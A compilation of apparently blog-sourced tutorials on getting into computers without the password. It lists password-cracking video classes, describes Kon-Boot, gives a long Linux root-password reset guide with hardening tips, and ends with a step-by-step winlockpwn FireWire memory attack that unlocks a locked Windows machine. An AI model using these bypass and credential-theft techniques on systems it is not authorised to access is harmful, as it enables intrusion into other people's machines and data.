Lots of password finding and crack topics were covered. Hashcat, OCLHashcat, Cain, SAMDump2, Nir’s Password Recovery Tools, Password Renew, Backtrack 4 R1, UBCD4Win and much more.

Part 1: Topics include: Why exploit local passwords?, Scenario:Imaged Systems, Grabbing local passwords, Hash Examples, Great Resources, Platforms Used: Ubuntu, Backtrack, UBCD4Win, Windows Profile, Windows System Trifecta, Anti-Virus Pains, Getting an account/changing an account password, hash insertion, Sala’s Password Renew, Keyloggers, Boot CD demos, SAMDump2, Browser Passwords, IE, Firefox Etc., PSPV, PasswordFox, IE Passview, ChromePass, RDP and VNC password grabbing, Instant Messaging, Stupid Web Apps rant, AOA: Any Old Asterisks (stuff hidden by Asterisks), Network Shares stored passwords, Outlook PST password cracking and hash collision example, Wireless profile passwords, WirelessKeyView, Sniffing them off the wire with Wireshard and Cain.
Download Class 1

Part 2: The best single video out there for showing Hashcat and OCLHashcat. Lots of info about using Hashcat/OCLHashcat, its advantages, and the power of a video card to boost cracking speed.
Download Class 2

Part 3: Windows LM and NTLM hash cracking, Time Memory Tradeoffs, SAM Cracking Prevention, Linux/Unix passwd and shadow files, Parts of a *nix hash, Windows Cached Domain Credentials, Problems with Windows 7, Cracking Creds Countered, Finding where Unknown Apps store passwords, System Process Monitoring, RegFromApp, ProcessActivityView, Procmon (Process Monitor), finding the hash type, Other Weird Vectors, Inverse Bruteforce, Look in the logs for passwords, upcoming events.
Download Class 3

Accessing a Windows computer without knowing the password is fairly simple with this free tool called Kon-Boot .There are alternatives like Ophcrack etc, but those rely on grabbing the SAM hashes and cracking those. What sets Kon-Boot apart is that is modifies the kernel on-the-fly while booting (everything is done virtually – without any interferences with physical system changes) and allows you to log into any account without entering a password. All you have to do is insert a boot (cd or floppy) disk burned with Kon-boot software(110kb) in to the computer and boot up.


Kon-boot which was initially started as a small project for Linux (mainly Ubuntu),where it allows to log into a Linux system as ‘root’ user without typing the correct password or to elevate privileges from current user to root. Now it was moved to windows platform where it enables Windows users to login to any password protected machine profile without any knowledge of the password.
This program works with the following versions of Windows: XP (SP1, SP2, SP3), Vista (Business, Ultimate), 2000, Server 2003 and 2008, and Windows 7. Kon-Boot also allows you to boot Linux (distributions: Ubuntu, Gentoo, Debian and Fedora) without a password as well.

http://www.piotrbania.com/all/kon-boot/

A good password has the problem of being difficult to remember. And sometimes you might need to get in to a system where the root password is long forgotten (or left with the system administrator before you).
Luckily there are ways of getting access to systems without having the password. This is of course in a sense also a security risk. That’s why you should always be aware that having unattended physical access to a computer system means the same as having root access to the operating system. Unless the information on a system is encrypted, it’s only as save as the room it’s in.

The method to use to reset the password if you lost the root (or only) password depends on the configuration of your system. But it mostly comes down to two separate tasks:

- get write access to the root partition

- change the password/circumvent control

Here are some things you can try from easy to more complicated.

1.booting into single user mode from the start menu

Some systems are configured to drop you into root shell without a password if you reboot them in single user mode. If your system has an option called single or recovery mode changes are it will drop you directly to the root prompt or as I know ubuntu does it serves up a menu with ‘drop to root shell prompt’ as an option. Sometimes you have to hit escape at startup to enter the boot menu.
Once in the root shell it’s as easy as typing passwd followed by your username and the passwd program will ask you for the new password. passwd without a name will change the root password.
If you don’t know the username anymore you can do

#cat /etc/ passwd this prints the password text file where every entry before the : is a valid username

or

#ls /home which will give you the username of the users on the system with a home directory (if the default home path is used)

If you have a system which has this boot option and you think this is just a to obvious security risk (don’t want your little sister to change your root password) you can easily remove this option by editing the file /boot/grub/menu.lst (if you use the grub boot loader) or /etc/lilo.conf (if you use lilo)
If you use Ubuntu you can set passwords for the menu options in the startup-manager from the administration menu security tab or remove the option in the advanced tab.
Grub and Lilo both have password options
to password protect grub create a md5 hash of your password ( #/sbin/grub-md5-crypt ) and edit the file /boot/grub/grub.conf add below the line timeout the following line:

password –md5 password-hash-here

grub configuration should be user root group root and 600 permissions.

to password protect boot menu entries just enter lock below the title line in the /boot/grub/menu.lst file

for protecting lilo edit the /etc/lilo.conf file before the first image stanza place the option

password=clear-text-password

2. booting into single user mode when there’s no menu entry at startup

If there’s no single or recovery option in the boot menu you can still boot into single mode by editing the startup entry. To do this in grub, while in the menu press ‘e’ this will let you edit the menu entries. Just append single to the line starting with kernel. press ‘b’ and the system will boot into single mode.
If your boot manager is Lilo you can pass Linux 1 or Linux emergency as boot parameters.
This approach won’t help you on all systems because many systems will ask you for the root password when booting into single user mode.(Debian does)

3. boot to root shell by using shell as init

If the single user mode has been disabled or is password protected just press ‘e’ in the grub boot menu and add init=/bin/bash (or any other shell executable) to the kernel line. Press ‘b’ to boot and you’ll get a root shell because the init process is replaced with bash while booting. This gives you a rather limited shell but it’s good enough, depending on your system configuration you might have to mount the root partition read/write before you can change the password. Do this by entering

#mount -no remount,rw /

After that you can use passwd again as in previous examples.

If your startup manager is Lilo you can give the boot parameters Linux init=/bin/bash

4. boot from alternative file system

This method is much less likely to be available as it requires some kind of “alternative file system” to be available. If you have non-root access and there is a writable partition (/tmp for instance) and you can place a linux file system relative to that partition for instance by downloading a minimal linux distro and unpacking it you can then give the root= option to grub and set the partition where you placed your own file system as root file system.
Executing the mount command will show the available partitions and how they are mounted. This will only work in very specific circumstances though.

5. boot from a bootable usb stick

If you have no way to access single user mode from the boot menu, or if your single user mode is password protected, you can still use an alternative boot medium. Many systems these days provide a boot option for booting from a usb stick. This is actually a very easy method. The access of boot sequence menu differs by system, most systems display a text like press esc to enter boot menu or something like that. Sometimes the system is already configured to try booting from removable medium first. Many systems also allow changing the boot sequence from the bios. Just change the boot sequence of the system to boot from usb or choose that option from the boot menu. This does require you to have a boot-able usb stick of course. There are many ways to make a usb stick boot-able one of them is described in my article about backtrack, which makes a great distro to use for this purpose by the way. Just boot from the usb device, and open a root shell. The next thing you have to do is find out which is the root partition. Use fdisk to list the available partitions:

#fdisk -l

This will show the disks available.
You can mount them with the mount command. First create a directory mkdir /newdir or mount the partition on an existing directory. Then mount the partition you think is the root.

#mount -o,rw /dev/hda1 /newdir

if mount complaints you have to specify partition type, you find the type as a letter/number combination where it says Id. To show a list of partition type name/Id combinations use /sbin/sfdisk -T

in this case use mount with -t option:

#mount -o,rw -t ext3 /dev/hda1 /newdir

check if it’s the right one with ls:

#ls /newdir (should list a root filesytem)

if it is the wrong partition, just do umount /newdir to unmount it and redo the previous steps with another partition from the list.

If it is the right partition use chroot:

#chroot /newdir

this will make the newdir your root dir

and then enter passwd to change the root password and reboot your system.

6. boot from CD

This is basically the same as option 5 but requires you to have a Linux live-cd or rescue-cd. Most linux installation cd’s double as recovery cd’s by giving you a rescue option at boot or some drop to root shell menu option anywhere in the process. You do need to have a cd/dvd player installed to use this option. The method is exactly the same as in option 5. There are a lot more systems that allow booting from cd/dvd (most older pc’s do) than from usb this makes it a more viable approach.

7. boot from network

Difficult to do in many cases, but if you have access to the bios or the system is already configured to try booting from the network, and you have a system which you can configure as a boot server, it’s more or less the same story as 5 and 6. Boot the system into a OS where you have root access and mount the disk, chroot and you are in.

If you can’t access the BIOS to change the boot sequence because it’s password protected, try searching Google for the master password for your BIOS. Or you can try removing the BIOS battery the BIOS battery is located on the motherboard and is there to keep the BIOS memory as the power is taken of the system. Unplug the system, remove the battery and wait for about 120 seconds. Be warned this will flush all BIOS information (configuration) most systems will boot fine when you reload default BIOS settings (not all). Some motherboards have jumpers for resetting BIOS, if you have the motherboard manual you can look it up. Laptops are sometimes equipped with security features which make flushing BIOS impossible or even render the system completely useless when trying to reset BIOS.

8. place an extra disk in the machine

In most cases the BIOS will auto-detect a new disk, so if you place a new disk containing a boot-able OS and make it the master and the old disk slave, you can make the system boot from the new disk.

9. remove the disk and place it in another machine

If you can’t do any of the above you can always take out the disk and place it in another Linux system. Than you can mount it, chroot to the disk and again use passwd to change the root password. Place back the disk and start the machine.

10. Try to gain root trough known vulnerabilities

If the system has been running for a long time (or not running) without anyone maintaining it, there’s a change it’s running a vulnerable service. This would probably take a lot of time to do. Try fingerprinting the system for running network services that have not been security patched. If there is a easy root exploit to run against the machine it might be possible to get in this way.

Securing your system

Securing yourself against all these options is very difficult. You can remove all removable medium drives, CD/DVD, diskette, fill your usb ports with glue, passwords on everything. The only real protection is encrypted disks on every device you can’t keep in a secure environment. If someone gains unattended physical access to your systems they have access to your data.

What you can do is make it very difficult, secure access to your computers as much as you think is appropriate considering the sensitivity of your data. When it comes to mobile devices, laptops netbooks and the like you should carefully consider what would happen if it gets lost or stolen and someone has access to all your data. Very good Encryption programs are freely available for Linux and you can even choose to encrypt your whole system, in some distributions this is an install option.

Think there is more to try? Easier ways? Think there are better ways to protect against it? Mistakes? Leave a comment. It can take a while before comments are published(different time zone)

I see a lot of howto’s what are based on the same “story”: boot in “single mode” and type passwd to change the password, but are some systems like Debian and probably others what doesn’t let you get in single mode if you don’t know the root password … so the single mode solution it will not work.

First I will describe you the single mode solution, because the start of this solution is very similar with the next solution what I will present you in the end.

How To change the root password in single mode

1. Restart the machine.
2. Press any key while GRUB menu is loading.
3. You will see the Grub Menu with you configured kernels.
4. Choose a good kernel (or the options what is starting your linux) and press e to edit it.
5. Now choose the line that begins with ‘kernel’. Press ‘e’ again to edit this line.
6. Now at the end of the line just add: single
7. Press Enter and after that press b to boot that kernel

After that the kernel will start loading and if you have lucky and your installation doesn’t have password on “single mode” you will can change the root password with passwd utility. If you have the luck to have a password on the single mode just follow the next steps:

Other way to change the linux root password

1. Follow the same steps as “single mode solution” but only until step 6.
2. Replace the step 6 with: Now at the end of the line just add: init=/bin/sh
3. Press Enter and after that press b to boot that kernel
4. Kernel will boot and it will stop in a shell
5. In this shell type: mount -o remount,rw /
6. Now type: passwd and change the password
7. Now type: sync to syncing disk (flush from memory to HDD).
8. After that remount the disk read only: mount -o remount,ro and reboot / Or Ctrl+Alt+Printscr+S, Ctrl+Alt+Printscr+U, Ctrl+Alt+Printscr+B if you have Magic Sysrq keys enable:)

What are MagicSysRq keys ?

Are some keys combination’s what will let you to access some kernel basic commands at low level. The combination’s what I give you above are for:

Ctrl+Alt+Printscr+S – sync the disk
Ctrl+Alt+Printscr+U – unmount the disk
Ctrl+Alt+Printscr+B – reboot

Boot Linux into single-user mode

1. Reboot the machine.
2. Press the ESC key while GRUB is loading to enter the menu.
3. If there is a ‘recovery mode’ option, select it and press ‘b’ to boot into single user mode.
4. Otherwise, the default boot configuration should be selected. Press ‘e’ to edit it.
5. Highlight the line that begins with ‘kernel’. Press ‘e’ again to edit this line.
6. At the end of the line, add an additional parameter: ‘single’. Hit return to make the change and press ‘b’ to boot.

Change the admin password
The system should load into single user mode and you’ll be left at the command line automatically logged in as root. Type ‘passwd’ to change the root password or ‘passwd someuser’ to change the password for your “someuser” admin account.

Reboot
Once your done, press ctrl-alt-del, or type ‘reboot’ to restart into your machine.

winlockpwn is a memory analysis tool released by Adam Boileau of storm.net.nz. This utility exploits firewire’s direct memory access. The operating system allows firewire devices to directly read/write memory without having to go through the processor. Sounds handy right?

I installed winlockpwn on Ubuntu 7.10 and a fully patched Windows XP SP2 box. The first step is to download the required libraries:

sudo aptitude install libdc1394-13 libraw1394-dev swig python

Now we need to download and install Python 2.3 because I tried to run it using Python 2.5 with no success:

wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar -zxvf Python-2.3.6.tgz
cd Python-2.3.6
./configure
make
sudo make install

The next step is to modify libraw1394:

sudo vim /usr/include/libraw1394/raw1394.h

At this point go ahead and search for “__attribute__((deprecated));” in the file raw1394.h and comment out every line that contains it. Hint: don’t forget to end the line above it with a semi-colon. Once you comment all of them out, save and close the file. The next step is to get the pythonraw1394 library. It contains the python bindings for libraw1394, romtool, and businfo from Adam’s site.

wget http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gz

And of course, we need to untar it

tar -zxvf pythonraw1394-1.0.tar.gz

Now we need to go into the untared directory and download the actual winlockpwn script:

cd pythonraw1394
wget http://www.storm.net.nz/static/files/winlockpwn

The winlockpwn script needs to be in the pythonraw1394 directory or it wont work without modifying the code. Also, we need to make it executable:

chmod +x winlockpwn

Now we also need to edit the Makefile for pythonraw1394 to point it to python 2.3′s include directory:

sudo vim Makefile

Now change /usr/include/python2.3 to /usr/local/include/python2.3 on lines 5 and 6. Again, save and quit and compile it with the following command:

sudo make

The raw1394 module also needs to also be loaded and the permissions changed on the raw1394 devices:

sudo modprobe raw1394
sudo chmod 666 /dev/raw1394

Now we need to plug into the windows machine and then edit the romtool to reflect the location of python:

sudo vim romtool

Change #!/usr/bin/python to #!/usr/local/bin/python on the first line one of the file.
Repeat the same step for the winlockpwn script as well.
And then load the ipod image onto the firewire port.

./romtool -s 0 ipod.csr

Loading the ipod image onto the firewire port basically fools windows into thinking your linux box is an ipod.
Now we can run businfo to make sure the ipod image is loaded and on what port number it is on as well as making sure you can see your computer on the other end. Mine showed the ipod image loaded onto port number 0 and my windows box on node number 1.
Now, the fun part! Run winlockpwn
as follows:

winlockpwn port node target

Mine looked like this:

./winlockpwn 0 1 1

Once you run winlockpwn, the windows box will accept any password you choose to give it (even a blank password) and unlock the system for you.

There are many security issues that arise from winlockpwn. What is to stop one of the janitorial staff from getting into the CEO’s office after hours and immediately getting access to his box because all he did was lock it before he went home? It just goes to show that once someone gains physical access, game over.